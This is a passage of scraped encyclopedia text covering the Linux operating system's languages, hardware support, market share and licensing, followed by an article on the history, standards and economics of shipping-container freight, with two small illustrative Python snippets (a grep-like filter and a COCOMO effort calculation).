andVirtual Pascal, as well as graphically viaLazarus,PascalABC.NET, orDelphiusingFireMonkey(previously throughBorland Kylix).[127][128] A common feature of Unix-like systems, Linux includes traditional specific-purpose programming languages targeted atscripting, text processing and system configuration and management in general. Linux distributions supportshell scripts,awk,sedandmake. Many programs also have an embedded programming language to support configuring or programming themselves. For example,regular expressionsare supported in programs likegrepandlocate, the traditional Unix message transfer agentSendmailcontains its ownTuring completescripting system, and the advanced text editorGNU Emacsis built around a general purposeLispinterpreter.[129][130][131] Most distributions also include support forPHP,Perl,Ruby,Pythonand otherdynamic languages. While not as common, Linux also supportsC#and otherCLIlanguages(viaMono),Vala, andScheme.Guile Schemeacts as anextension languagetargeting the GNU system utilities, seeking to make the conventionally small,static, compiled C programs ofUnix designrapidly and dynamically extensible via an elegant,functionalhigh-level scripting system; many GNU programs can be compiled with optional Guilebindingsto this end. 
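The text-processing style described above, small tools driven by regular expressions in the spirit of grep, sed, and awk, can be sketched in a few lines. The following minimal example (the script name and sample pattern are illustrative) filters standard input with a regular expression, much as grep does:

```python
# minigrep.py -- an illustrative, grep-like filter using regular expressions.
# Example usage: python minigrep.py 'error|warn' < /var/log/syslog
import re
import sys

pattern = re.compile(sys.argv[1])   # the pattern is taken from the command line
for line in sys.stdin:
    if pattern.search(line):        # print only lines that match, as grep does
        sys.stdout.write(line)
```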
A number ofJava virtual machinesand development kits run on Linux, including the original Sun Microsystems JVM (HotSpot), and IBM's J2SE RE, as well as many open-source projects likeKaffeandJikes RVM;Kotlin,Scala,Groovyand otherJVM languagesare also available. GNOMEandKDEare popular desktop environments and provide a framework for developing applications. These projects are based on theGTKandQtwidget toolkits, respectively, which can also be used independently of the larger framework. Both support a wide variety of languages. There area numberofIntegrated development environmentsavailable includingAnjuta,Code::Blocks,CodeLite,Eclipse,Geany,ActiveState Komodo,KDevelop,Lazarus,MonoDevelop,NetBeans, andQt Creator, while the long-established editorsVim,nanoandEmacsremain popular.[132] The Linux kernel is a widely ported operating system kernel, available for devices ranging from mobile phones to supercomputers; it runs on a highly diverse range ofcomputer architectures, includingARM-based Android smartphones and theIBM Zmainframes. Specialized distributions and kernel forks exist for less mainstream architectures; for example, theELKSkernelforkcan run onIntel 8086orIntel 8028616-bit microprocessors,[133]while theμClinuxkernel fork may run on systems without amemory management unit.[134]The kernel also runs on architectures that were only ever intended to use a proprietary manufacturer-created operating system, such asMacintoshcomputers[135][136](withPowerPC,Intel, andApple siliconprocessors),PDAs,video game consoles,portable music players, and mobile phones. Linux has a reputation for supporting old hardware very well by maintaining standardized drivers for a long time.[137]There are several industry associations and hardwareconferencesdevoted to maintaining and improving support for diverse hardware under Linux, such asFreedomHEC. Over time, support for different hardware has improved in Linux, resulting in any off-the-shelf purchase having a "good chance" of being compatible.[138] In 2014, a new initiative was launched to automatically collect a database of all tested hardware configurations.[139] Many quantitative studies of free/open-source software focus on topics including market share and reliability, with numerous studies specifically examining Linux.[140]The Linux market is growing, and the Linux operating system market size is expected to see a growth of 19.2% by 2027, reaching $15.64 billion, compared to $3.89 billion in 2019.[141]Analysts project a Compound Annual Growth Rate (CAGR) of 13.7% between 2024 and 2032, culminating in a market size of US$34.90 billion by the latter year.[citation needed]Analysts and proponents attribute the relative success of Linux to its security, reliability, low cost, and freedom fromvendor lock-in.[142][143] As of 2024, estimates suggest Linux accounts for at least 80% of the public cloud workload, partly thanks to its widespread use in platforms like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform.[150][151][152] ZDNet report that 96.3% of the top one million web servers are running Linux.[153][154]W3Techs state that Linux powers at least 39.2% of websites whose operating system is known, with other estimates saying 55%.[155][156] The Linux kernel islicensedunder the GNU General Public License (GPL), version 2. 
The GPL requires that anyone who distributes software based on source code under this license must make the originating source code (and any modifications) available to the recipient under the same terms.[172]Other key components of a typical Linux distribution are also mainly licensed under the GPL, but they may use other licenses; many libraries use theGNU Lesser General Public License(LGPL), a more permissive variant of the GPL, and theX.Orgimplementation of the X Window System uses theMIT License. Torvalds states that the Linux kernel will not move from version 2 of the GPL to version 3.[173][174]He specifically dislikes some provisions in the new license which prohibit the use of the software indigital rights management.[175]It would also be impractical to obtain permission from all the copyright holders, who number in the thousands.[176] A 2001 study ofRed Hat Linux7.1 found that this distribution contained 30 millionsource lines of code.[177]Using theConstructive Cost Model, the study estimated that this distribution required about eight thousand person-years of development time. According to the study, if all this software had been developed by conventional proprietary means, it would have cost aboutUS$1.82 billion[178]to develop in 2023 in the United States.[177]Most of the source code (71%) was written in the C programming language, but many other languages were used, includingC++,Lisp, assembly language, Perl, Python,Fortran, and variousshell scriptinglanguages. Slightly over half of all lines of code were licensed under the GPL. The Linux kernel itself was 2.4 million lines of code, or 8% of the total.[177] In a later study, the same analysis was performed for Debian version 4.0 (etch, which was released in 2007).[179]This distribution contained close to 283 million source lines of code, and the study estimated that it would have required about seventy three thousand man-years and costUS$10.2 billion[178](in 2023 dollars) to develop by conventional means. In the United States, the nameLinuxis a trademark registered to Linus Torvalds.[14]Initially, nobody registered it. However, on August 15, 1994, William R. Della Croce Jr. filed for the trademarkLinux, and then demanded royalties from Linux distributors. In 1996, Torvalds and some affected organizations sued him to have the trademark assigned to Torvalds, and, in 1997, the case was settled.[181]The licensing of the trademark has since been handled by theLinux Mark Institute(LMI). Torvalds has stated that he trademarked the name only to prevent someone else from using it. LMI originally charged a nominal sublicensing fee for use of the Linux name as part of trademarks,[182]but later changed this in favor of offering a free, perpetual worldwide sublicense.[183] The Free Software Foundation (FSF) prefersGNU/Linuxas the name when referring to the operating system as a whole, because it considers Linux distributions to bevariantsof the GNU operating system initiated in 1983 byRichard Stallman, president of the FSF.[28][29]The foundation explicitly takes no issue over the name Android for the Android OS, which is also an operating system based on the Linux kernel, as GNU is not a part of it. 
A minority of public figures and software projects other than Stallman and the FSF, notably distributions consisting only of free software, such as Debian (which had been sponsored by the FSF up to 1996),[184] also use GNU/Linux when referring to the operating system as a whole.[185][186][187] Most media and common usage, however, refer to this family of operating systems simply as Linux, as do many large Linux distributions (for example, SUSE Linux and Red Hat Enterprise Linux). As of May 2011, about 8% to 13% of the lines of code of the Linux distribution Ubuntu (version "Natty") consist of GNU components (the range depending on whether GNOME is considered part of GNU); meanwhile, about 6% come from the Linux kernel, rising to 9% when its direct dependencies are included.[188]
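Line counts like these feed directly into the development-cost estimates cited earlier. As a hedged illustration only, the basic "organic-mode" COCOMO formula (effort in person-months = 2.4 × KLOC^1.05) applied to a single 30-million-line code base gives roughly ten thousand person-years; the studies cited above applied the model package by package with their own cost parameters, which is why their published totals differ.

```python
# Hedged illustration of the arithmetic behind COCOMO-style estimates.
# Basic COCOMO, "organic" mode: effort (person-months) = 2.4 * KLOC ** 1.05.
# The cited studies ran the model per package with their own parameters,
# so their published figures are lower than this single aggregate run.
def cocomo_effort_person_years(sloc: int) -> float:
    kloc = sloc / 1000.0
    person_months = 2.4 * kloc ** 1.05
    return person_months / 12.0

print(round(cocomo_effort_person_years(30_000_000)))  # about 10,000 person-years for 30 MSLOC
```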
https://en.wikipedia.org/wiki/Linux
Containerization is a system of intermodal freight transport using intermodal containers (also called shipping containers, or ISO containers).[1] Containerization, also referred to as container stuffing or container loading, is the process of unitizing cargo for export. It is the predominant form of unitization of export cargo today, as opposed to other systems such as the barge system or palletization.[2] The containers have standardized dimensions. They can be loaded and unloaded, stacked, transported efficiently over long distances, and transferred from one mode of transport to another—container ships, rail transport flatcars, and semi-trailer trucks—without being opened. The handling system is mechanized so that all handling is done with cranes[3] and special forklift trucks. All containers are numbered and tracked using computerized systems. Containerization originated several centuries ago but was not well developed or widely applied until after World War II, when it dramatically reduced the costs of transport, supported the post-war boom in international trade, and was a major element in globalization. Containerization eliminated manual sorting of most shipments and the need for dock front warehouses, while displacing many thousands of dock workers who formerly handled break bulk cargo. Containerization reduced congestion in ports, significantly shortened shipping time, and reduced losses from damage and theft.[4] Containers can be made from a wide range of materials such as steel, fibre-reinforced polymer, aluminum, or a combination. Containers made from weathering steel are used to minimize maintenance needs. Before containerization, goods were usually handled manually as break bulk cargo. Typically, goods would be loaded onto a vehicle from the factory and taken to a port warehouse, where they would be offloaded and stored awaiting the next vessel. When the vessel arrived, they would be moved to the side of the ship along with other cargo to be lowered or carried into the hold and packed by dock workers. The ship might call at several other ports before off-loading a given consignment of cargo. Each port visit would delay the delivery of other cargo. Delivered cargo might then have been offloaded into another warehouse before being picked up and delivered to its destination. Multiple handling and delays made transport costly, time-consuming and unreliable.[4] Containerization has its origins in early coal mining regions in England beginning in the late 18th century. In 1766, James Brindley designed the "starvationer" box boat with ten wooden containers, to transport coal from Worsley Delph (quarry) to Manchester by the Bridgewater Canal. In 1795, Benjamin Outram opened the Little Eaton Gangway, upon which coal was carried in wagons built at his Butterley Ironworks. The horse-drawn wheeled wagons on the gangway took the form of containers, which, loaded with coal, could be transshipped from canal barges on the Derby Canal, which Outram had also promoted.[5] By the 1830s, railroads were carrying containers that could be transferred to other modes of transport. The Liverpool and Manchester Railway in the UK was one of these, making use of "simple rectangular timber boxes" to convey coal from Lancashire collieries to Liverpool, where a crane transferred them to horse-drawn carriages.[6] Originally used for moving coal on and off barges, "loose boxes" were used to containerize coal from the late 1780s, at places like the Bridgewater Canal. By the 1840s, iron boxes were in use as well as wooden ones.
The early 1900s saw the adoption of closed container boxes designed for movement between road and rail. On 17 May 1917,Louisville, Kentucky, native[7]Benjamin Franklin "B. F." Fitch (1877–1956)[8]launched commercial use of "demountable bodies" inCincinnati, Ohio, which he had designed as transferable containers. In 1919, his system was extended to over 200 containers serving 21 railway stations with 14 freight trucks.[9] In 1919,engineerStanisław Rodowicz developed the first draft of the container system inPoland. In 1920, he built a prototype of the biaxial wagon. ThePolish-Bolshevik Warstopped development of the container system in Poland.[10] The U.S. Post Office contracted with theNew York Central Railroadto move mail via containers in May 1921. In 1930, theChicago & Northwestern Railroadbegan shipping containers between Chicago and Milwaukee. Their efforts ended in the spring of 1931 when theInterstate Commerce Commissiondisallowed the use of a flat rate for the containers.[11] In 1926, a regular connection of the luxury passenger train from London to Paris,Golden Arrow/Fleche d'Or, bySouthern RailwayandFrench Northern Railway, began. For transport of passengers' baggage four containers were used. These containers were loaded in London or Paris and carried to ports, Dover or Calais, on flat cars in the UK and "CIWL Pullman Golden Arrow Fourgon of CIWL" in France. At the Second World Motor Transport Congress in Rome, September 1928, Italian senatorSilvio Crespiproposed the use of containers for road and railway transport systems, using collaboration rather than competition. This would be done under the auspices of an international organ similar to the Sleeping Car Company, which provided international carriage of passengers in sleeping wagons. In 1928Pennsylvania Railroad(PRR) started regular container service in the northeast U.S. After theWall Street crash of 1929inNew Yorkand the subsequent Great Depression, many countries were without any means to transport cargo. The railroads were sought as a possibility to transport cargo, and there was an opportunity to bring containers into broader use. In February 1931 the first container ship was launched. It was called the Autocarrier, owned by Southern Railway UK. It had 21 slots for containers of Southern Railway.[12][13]Under auspices of the International Chamber of Commerce in Paris inVeniceon September 30, 1931, on one of the platforms of the Maritime Station (Mole di Ponente), practical tests assessed the best construction for European containers as part of an international competition.[14] In 1931, in the U.S., B. F. Fitch designed the two largest and heaviest containers in existence. One measured 17 ft 6 in (5.33 m) by 8 ft 0 in (2.44 m) by 8 ft 0 in (2.44 m) with a capacity of 30,000 pounds (14,000 kg) in 890 cubic feet (25 m3), and a second measured 20 ft 0 in (6.10 m) by 8 ft 0 in (2.44 m) by 8 ft 0 in (2.44 m), with a capacity of 50,000 pounds (23,000 kg) in 1,000 cubic feet (28 m3).[15] In November 1932, inEnola, Pennsylvania, the firstcontainer terminalin the world was opened by thePennsylvania Railroad.[14]The Fitch hooking system was used for reloading of the containers.[15] The development of containerization was created in Europe and the U.S. 
as a way to revitalize rail companies after theWall Street crash of 1929, which had caused economic collapse and reduction in use of all modes of transport.[14] In 1933 in Europe, under the auspices of the International Chamber of Commerce, theInternational Container Bureau(French:Bureau International des Conteneurs, B.I.C.) was established. In June 1933, the B.I.C. decided on obligatory parameters for containers used in international traffic. Containers handled by means of lifting gear, such as cranes, overhead conveyors, etc. for traveling elevators (group I containers), constructed after July 1, 1933. Obligatory Regulations: In April 1935 BIC established a second standard for European containers:[14] From 1926 to 1947 in the U.S., theChicago North Shore and Milwaukee Railwaycarried motor carrier vehicles and shippers' vehicles loaded onflatcarsbetween Milwaukee, Wisconsin, and Chicago, Illinois. Beginning in 1929,Seatrain Linescarried railroad boxcars on its sea vessels to transport goods between New York and Cuba.[16] In the mid-1930s, theChicago Great Western Railwayand then theNew Haven Railroadbegan "piggyback" service (transporting highway freight trailers on flatcars) limited to their own railroads. The Chicago Great Western Railway filed a U.S. patent in 1938 on their method of securing trailers to a flatcars using chains and turnbuckles. Other components included wheel chocks and ramps for loading and unloading the trailers from the flatcars.[17]By 1953, theChicago, Burlington and Quincy, theChicago and Eastern Illinois, and theSouthern Pacificrailroads had joined the innovation. Most of the rail cars used were surplus flatcars equipped with new decks. By 1955, an additional 25 railroads had begun some form of piggyback trailer service. During World War II, theAustralian Armyused containers to more easily deal with variousbreaks of gaugein the railroads. These non-stackable containers were about the size of the later20-foot ISO containerand perhaps made mainly of wood.[18][need quotation to verify] During the same time, theUnited States Armystarted to combine items of uniform size, lashing them onto a pallet,unitizingcargo to speed the loading and unloading of transport ships. In 1947 theTransportation Corpsdeveloped theTransporter, a rigid, corrugated steel container with a 9,000 lb (4,100 kg) carrying capacity, for shipping household goods of officers in the field. It was 8 ft 6 in (2.59 m) long, 6 ft 3 in (1.91 m), and 6 ft 10 in (2.08 m) high, with double doors on one end, mounted on skids, and had lifting rings on the top four corners.[19][20]During theKorean Warthe Transporter was evaluated for handling sensitive military equipment and, proving effective, was approved for broader use. Theft of material and damage towoodencrates convinced the army that steel containers were needed. In April 1951, atZürich Tiefenbrunnen railway station, the Swiss Museum of Transport andBureau International des Containers(BIC) held demonstrations of container systems, with the aim of selecting the best solution for Western Europe. Present were representatives from France, Belgium, the Netherlands, Germany, Switzerland, Sweden, Great Britain, Italy and the United States. The system chosen for Western Europe was based on the Netherlands' system for consumer goods and waste transportation calledLaadkisten(literally, "loading bins"), in use since 1934. 
This system usedroller containersthat were moved by rail, truck and ship, in various configurations up to a capacity of 5,500 kg (12,100 lb), and up to3.1 by 2.3 by 2 metres (10 ft 2 in × 7 ft6+1⁄2in × 6 ft6+3⁄4in) size.[21][22]This became the first post World War II European railway standardUIC590, known as "pa-Behälter." It was implemented in the Netherlands, Belgium, Luxembourg, West Germany, Switzerland, Sweden and Denmark.[23]With the popularization of the larger ISO containers, support for pa containers was phased out by the railways. In the 1970s they began to be widely used for transporting waste.[23] In 1952 the U.S. Army developed the Transporter into the CONtainer EXpress orCONEX boxsystem. The size and capacity of the CONEXes were about the same as the Transporter,[nb 1]but the system was mademodular, by the addition of a smaller, half-size unit of 6 ft 3 in (1.91 m) long, 4 ft 3 in (1.30 m) wide and6 ft10+1⁄2in (2.10 m) high.[26][27][nb 2]CONEXes could be stacked three high, and protected their contents from the elements.[24] The first major shipment of CONEXes, containing engineering supplies and spare parts, was made by rail from the Columbus General Depot in Georgia to thePort of San Francisco, then by ship to Yokohama, Japan, and then to Korea, in late 1952. Transit times were almost halved. By the time of theVietnam Warthe majority of supplies and materials were shipped by CONEX. By 1965 the U.S. military used some 100,000 CONEX boxes, and more than 200,000 in 1967.[27][31]making this the first worldwide application of intermodal containers.[24]After theUS Department of Defensestandardized an 8-by-8-foot (2.44 by 2.44 m) cross section container in multiples of 10-foot (3.05 m) lengths for military use, it was rapidly adopted for shipping purposes.[citation needed] In 1955, former trucking company ownerMalcom McLeanworked with engineerKeith Tantlingerto develop the modernintermodal container.[32]All the containerization pioneers who came before McLean had thought in terms of optimizing particular modes of transport. McLean's "fundamental insight" which made the intermodal container possible was that the core business of the shipping industry "was moving cargo, not sailing ships".[33]He visualized and helped to bring about a world reoriented around that insight, which required not just standardization of the metal containers themselves, but drastic changes toeveryaspect of cargo handling.[33] In 1955, McLean and Tantlinger's immediate challenge was to design ashipping containerthat could efficiently be loaded onto ships and would hold securely on sea voyages. The result was an 8 feet (2.44 m) tall by 8 ft (2.44 m) wide box in 10 ft (3.05 m)-long units constructed from2.5 mm (13⁄128in) thick corrugated steel. The design incorporated atwistlockmechanism atop each of the four corners, allowing the container to beeasily secured and liftedusing cranes. Several years later, as aFruehaufexecutive, Tantlinger went back to McLean and convinced him to relinquish control of their design to help stimulate the container revolution. 
On January 29, 1963, McLean's companySeaLandreleased its patent rights, so that Tantlinger's inventions could become "the basis for a standard corner fitting and twist lock".[34]Tantlinger was deeply involved in the debates and negotiations which in back-to-back votes in September 1965 (on September 16 and 24, respectively) led to the adoption of a modified version of the Sea-Land design as the American and then the international standard for corner fittings for shipping containers.[35]This began international standardization of shipping containers.[36] The first vessels purpose-built to carry containers had begun operation in 1926 for the regular connection of the luxury passenger train between London and Paris, theGolden Arrow/Fleche d'Or. Four containers were used for the conveyance of passengers' baggage. These containers were loaded in London or Paris and carried to the ports of Dover or Calais.[14]In February 1931 the first container ship in the world was launched. It was called the Autocarrier, owned by the UK's Southern Railway. It had 21 slots for containers of Southern Railway.[12][13] The next step was in Europe after World War II. Vessels purpose-built to carry containers were used between UK and Netherlands[23]and also in Denmark in 1951.[37]In the United States, ships began carrying containers in 1951, betweenSeattle, Washington, and Alaska.[38]None of these services was particularly successful. First, the containers were rather small, with 52% of them having a volume of less than 3 cubic metres (106 cu ft). Almost all European containers were made of wood and used canvas lids, and they required additional equipment for loading into rail or truck bodies.[39] The world's first purpose-built container vessel wasClifford J. Rodgers,[40]built in Montreal in 1955 and owned by theWhite Pass and Yukon Corporation.[41]Her first trip carried 600 containers between North Vancouver, British Columbia, and Skagway, Alaska, on November 26, 1955. In Skagway, the containers were unloaded to purpose-builtrailroad carsfor transport north to Yukon, in the firstintermodalservice using trucks, ships, and railroad cars.[42]Southbound containers were loaded by shippers in Yukon and moved by rail, ship, and truck to their consignees without opening. This first intermodal system operated from November 1955 until 1982.[43] The first truly successful container shipping company dates to April 26, 1956, when American trucking entrepreneur McLean put 58trailer vans[44]later called containers, aboard a refitted tanker ship, theSSIdeal X, and sailed them fromNewark, New Jersey, toHouston, Texas.[45]Independently of the events in Canada, McLean had the idea of using large containers that never opened in transit and that were transferable on an intermodal basis, among trucks, ships, and railroad cars. McLean had initially favored the construction of "trailerships"—taking trailers from large trucks and stowing them in a ship'scargohold. This method of stowage, referred to asroll-on/roll-off, was not adopted because of the large waste in potential cargo space on board the vessel, known as brokenstowage. Instead, McLean modified his original concept into loading just the containers, not the chassis, onto the ship; hence the designation "container ship" or "box" ship.[46][4](See alsopantechnicon vanandtrolley and lift van.) During the first 20 years of containerization, many container sizes and corner fittings were used. There were dozens of incompatible container systems in the US alone. 
Among the biggest operators, theMatson Navigation Companyhad a fleet of 24-foot (7.32 m) containers, whileSea-Land Service, Incused 35-foot (10.67 m) containers. The standard sizes and fitting and reinforcement norms that now exist evolved out of a lengthy and complex series of compromises among international shipping companies, European railroads, US railroads, and US trucking companies. Everyone had to sacrifice something. For example, to McLean's frustration, Sea-Land's 35-foot container was not adopted as one of the standard container sizes.[34]In the end, four important ISO (International Organization for Standardization) recommendations standardized containerization globally:[47] Based on these standards, the firstTEUcontainer ship was the JapaneseHakone Maru[de;jp]from shipowner NYK, which started sailing in 1968 and could carry 752 TEU containers. In the US, containerization and other advances in shipping were impeded by theInterstate Commerce Commission(ICC), which was created in 1887 to keep railroads from using monopolist pricing and rate discrimination, but fell victim toregulatory capture. By the 1960s, ICC approval was required before any shipper could carry different items in the same vehicle or change rates. The fully integrated systems in the US today became possible only after the ICC's regulatory oversight was cut back (and abolished in 1995). Trucking and rail were deregulated in the 1970s and maritime rates were deregulated in 1984.[48] Double-stacked rail transport, where containers are stacked two high on railway cars, was introduced in the US. The concept was developed by Sea-Land and the Southern Pacific railroad. The first standalone double-stack container car (or single-unit 40-foot (12.2 m) COFC well car) was delivered in July 1977. The five-unit well car, the industry standard, appeared in 1981. Initially, these double-stack railway cars were deployed in regular train service. Ever since American President Lines initiated in 1984 a dedicated double-stack container train service between Los Angeles and Chicago, transport volumes increased rapidly.[49] Containerization greatly reduced the expense ofinternational tradeand increased its speed, especially of consumer goods and commodities. It also dramatically changed the character of port cities worldwide. Prior to highly mechanized container transfers, crews of 20 to 22longshoremenwould pack individual cargoes into the hold of a ship. After containerization, large crews of longshoremen were not necessary at port facilities, and the profession changed drastically. Meanwhile, the port facilities needed to support containerization changed. One effect was the decline of some ports and the rise of others. At thePort of San Francisco, the former piers used for loading and unloading were no longer required, but there was little room to build the vast holding lots needed for storing and sorting containers in transit between different transport modes. As a result, the Port of San Francisco essentially ceased to function as a major commercial port, but the neighboringPort of Oaklandemerged as the second largest on the US West Coast. A similar fate occurred with the relationship between theports of Manhattan and New Jersey. In the UK, thePort of LondonandPort of Liverpooldeclined in importance. Meanwhile, Britain'sPort of FelixstoweandPort of Rotterdamin the Netherlands emerged as major ports. 
In general, containerization causedinland portson waterways incapable of receiving deep-draftship traffic to decline in favor ofseaports, which then built vast container terminals next to deep oceanfront harbors in lieu of the dockfront warehouses and finger piers that had formerly handled break bulk cargo. With intermodal containers, the jobs of packing, unpacking, and sorting cargoes could be performed far from the point of embarkation. Such work shifted to so-called "dry ports" and gigantic warehouses in rural inland towns, where land and labor were much cheaper than in oceanfront cities. This fundamental transformation of where warehouse work was performed freed up valuable waterfront real estate near thecentral business districtsof port cities around the world forredevelopmentand led to a plethora of waterfront revitalization projects (such aswarehouse districts).[50] The effects of containerization rapidly spread beyond the shipping industry. Containers were quickly adopted by trucking and rail transport industries for cargo transport not involving sea transport. Manufacturing also evolved to adapt to take advantage of containers. Companies that once sent small consignments began grouping them into containers. Many cargoes are now designed to precisely fit containers. The reliability of containers madejust in time manufacturingpossible as component suppliers could deliver specific components on regular fixed schedules. In 2004, global container traffic was 354 millionTEUs, of which 82 percent were handled by the world's top 100 container ports.[51] As of 2009[update], approximately 90% of non-bulk cargoworldwide is moved by containers stacked on transport ships;[52]26% of all containertransshipmentis carried out in China.[53]For example, in 2009 there were 105,976,701 transshipments in China (both international and coastal, excluding Hong Kong), 21,040,096 in Hong Kong (which is listed separately), and only 34,299,572 in the United States. In 2005, some 18 million containers made over 200 million trips per year. Some ships can carry over 14,500twenty-foot equivalent units(TEU), such as theEmma Mærsk, 396 m (1,299 ft) long, launched in August 2006. It has been predicted that, at some point, container ships will be constrained in size only by the depth of theStraits of Malacca, one of the world's busiest shipping lanes, linking the Indian Ocean to the Pacific Ocean. This so-calledMalaccamaxsize constrains a ship to dimensions of 470 m (1,542 ft) in length and 60 m (197 ft) wide.[4] Few foresaw the extent of the influence of containerization on theshipping industry. In the 1950s, Harvard University economistBenjamin Chinitzpredicted that containerization would benefit New York by allowing it to ship its industrial goods more cheaply to the Southern US than other areas, but he did not anticipate that containerization might make it cheaper to import such goods from abroad. 
Most economic studies of containerization merely assumed that shipping companies would begin to replace older forms of transportation with containerization, but did not predict that the process of containerization itself would have a more direct influence on the choice of producers and increase the total volume of trade.[4] The widespread use of ISO standard containers has driven modifications in other freight-moving standards, gradually forcing removable truck bodies orswap bodiesinto standard sizes and shapes (though without the strength needed to be stacked), and changing completely the worldwide use of freightpalletsthat fit into ISO containers or into commercial vehicles. Improved cargo security is an important benefit of containerization. Once the cargo is loaded into a container, it is not touched again until it reaches its destination.[54]The cargo is not visible to casual viewers, and thus is less likely to be stolen. Container doors are usually sealed so that tampering is more evident. Some containers are fitted with electronic monitoring devices and can be remotely monitored for changes in air pressure, which happens when the doors are opened. This reduced thefts that had long plagued the shipping industry. Recent developments have focused on the use of intelligent logistics optimization to further enhance security. The use of the same basic sizes of containers across the globe has lessened the problems caused by incompatiblerail gaugesizes. The majority of the rail networks in the world operate on a1,435 mm(4 ft8+1⁄2in) gauge track known asstandard gauge, but some countries (such as Russia, India, Finland, and Lithuania) usebroader gauges, while others in Africa and South America usenarrower gauges. The use of container trains in all these countries makes transshipment between trains of different gauges easier. Containers have become a popular way toship private cars and other vehiclesoverseas using 20- or 40-foot containers. Unlikeroll-on/roll-offvehicle shipping, personal effects can be loaded into the container with the vehicle, allowing easy international relocation.[citation needed] In July, 2020, The Digital Container Shipping Association (DCSA), a non-profit group established to further digitalisation of container shipping technology standards, published standards for the digital exchange of operational vessel schedules (OVS).[55] Contrary to ocean shipping containers owned by the shippers, a persisting trend in the industry is for (new) units to be purchased by leasing companies. Leasing business accounted for 55% of new container purchases in 2017, with their box fleet growing at 6.7%, compared to units of transport operators growing by just 2.4% more TEU, said global shipping consultancy Drewry in their 'Container Census & Leasing and Equipment Insight', leading to a leased share of the global ocean container fleet reaching 54% by 2020.[56] In 2021, the average time to unload a container in Asia was 27 seconds, the average time in Northern Europe was 46 seconds, and the average time in North America was 76 seconds.[57] There are five common standard lengths: US domestic standard containers are generally 48 ft (14.63 m) and 53 ft (16.15 m) (rail and truck). Container capacity is often expressed intwenty-foot equivalent units(TEU, or sometimesteu). An equivalent unit is a measure of containerized cargo capacity equal to one standard 20 ft (6.10 m) (length) × 8 ft (2.44 m) (width) container. As this is an approximate measure, the height of the box is not considered. 
For instance, the 9 ft 6 in (2.90 m) high cube and the 4 ft 3 in (1.30 m) half height 20 ft (6.10 m) containers are also called one TEU. 48 ft containers have been phased out over the last ten years in favor of 53 ft containers. The maximum gross mass for a 20 ft (6.10 m) dry cargo container was initially set at 24,000 kg (53,000 lb), and 30,480 kg (67,200 lb) for a 40 ft (12.19 m) container (including the 9 ft 6 in or 2.90 m high cube). Allowing for the tare mass of the container, the maximum payload mass is therefore reduced to approximately 22,000 kg (49,000 lb) for 20 ft (6.10 m) containers, and 27,000 kg (60,000 lb) for 40 ft (12.19 m) containers.[58] The maximum gross mass for the 20 ft container was increased to 30,480 kg in 2005, and then to a maximum of 36,000 kg for all sizes by Amendment 2 (2016) to the ISO 668 standard (2013 edition). The original choice of 8-foot (2.44 m) height for ISO containers was made in part to suit a large proportion of railway tunnels, though some had to be modified. The current standard is eight feet six inches (2.59 m) high. With the arrival of even taller hi-cube containers at nine feet six inches (2.90 m) and double stacking rail cars, further enlargement of the rail loading gauge is proving necessary.[59] While major airlines use containers that are custom designed for their aircraft and associated ground handling equipment, the IATA has created a set of standard aluminium container sizes of up to 11.52 m3 (407 cu ft) in volume. A number of other container systems have also been used over the years. A full container load (FCL)[77] is an ISO standard container that is loaded and unloaded under the risk and account of one shipper and one consignee. In practice, it means that the whole container is intended for one consignee. FCL container shipment tends to have lower freight rates than an equivalent weight of cargo in bulk. FCL is intended to designate a container loaded to its allowable maximum weight or volume, but FCL in practice on ocean freight does not always mean a full payload or capacity – many companies will prefer to keep a 'mostly' full container as a single container load to simplify logistics and increase security compared to sharing a container with other goods. Less-than-container load (LCL) is a shipment that is not large enough to fill a standard cargo container. The abbreviation LCL formerly applied to "less than (railway) car load" for quantities of material from different shippers or for delivery to different destinations carried in a single railway car for efficiency. LCL freight was often sorted and redistributed into different railway cars at intermediate railway terminals en route to the final destination.[78] Groupage is the process of filling a container with multiple shipments for efficiency.[79] LCL is "a quantity of cargo less than that required for the application of a carload rate. A quantity of cargo less than that which fills the visible or rated capacity of an inter-modal container." It can also be defined as "a consignment of cargo which is inefficient to fill a shipping container. It is grouped with other consignments for the same destination in a container at a container freight station".[80] Containers are actively used for smuggling and trafficking illicit goods and people.
Drugs, antiques, weapons, undeclared merchandise, jewellery, human beings, wildlife, counterfeit products, as well as chemical, radioactive and biological materials, are illegally transported via containers.[81][82][83][84][85][86]Additionally, there are concerns about terrorists using containers to transport weapons of mass destruction (WMD).[87]However, these concerns remain hypothetical.[88] There are several ways in which illicit goods are smuggled. One method involves forging documents to make a container appear as legal cargo.[81][89]Another method is inserting illegal goods into a legitimate shipment, mixing legal and illegal items together.[90][81]For example, in 2024, several shipments of drugs, either disguised as banana cargo or mixed with legal banana shipments, were discovered in Germany, Greece, Spain and Great Britain.[91][92][93][94]Criminal groups use legitimate fruit businesses as fronts for their narcotics operations, making fruit cargo a common method for concealing drugs.[95]Trafficking in wildlife parts, such as ivory, frequently involves altering the appearance of the goods. For instance, ivory has been known to be cut into the shape of chocolate bars or painted the colour of wood to avoid detection during X-ray inspections.[96]Additionally, containers can be physically modified to hide illegal parcels, such as through the use of fake walls, secret compartments, hollowed-out rails, support beams and doors.[90] The lack of capacity at ports to inspect containers increases the likelihood of smuggled goods going undetected. In African ports, especially West Africa, where most drug routes converge, only about 2% of all containers are inspected.[81][97]Similarly, European ports check just 2–10% of incoming containers, leaving the majority unscreened and creating opportunities for trafficking.[81][98] Nevertheless, there are a number of security measures in place, notably theContainer Security Initiative(CSI), a post-9/11 US-led programme. This initiative aims to pre-screen high-risk cargo before it reaches US territory. One of its primary goals is to prevent the smuggling of weapons of mass destruction (WMD).[99][100] Although the programme was initiated by the United States, by 2007, some 20 countries had signed a Memorandum of Understanding with the US, leading to the implementation of CSI measures at 58 ports around the world. The CSI system includes non-intrusive pre-screening methods, such as X-ray and radiation screening, for high-risk cargo destined for the United States. As a result, more than 80% of containerised cargo bound for the United States is pre-screened.[99][100] Containers are intended to be used constantly, being loaded with new cargo for a new destination soon after emptied of previous cargo. This is not always possible, and in some cases, the cost of transporting an empty container to a place where it can be used is considered to be higher than the worth of the used container.Shipping linesand container leasing companies have become expert at repositioning empty containers from areas of low or no demand, such as the US West Coast, to areas of high demand, such as China. Repositioning within the port hinterland has also been the focus of recent logistics optimization work. Damaged or retired containers may be recycled in the form ofshipping container architecture, or the steel content salvaged. 
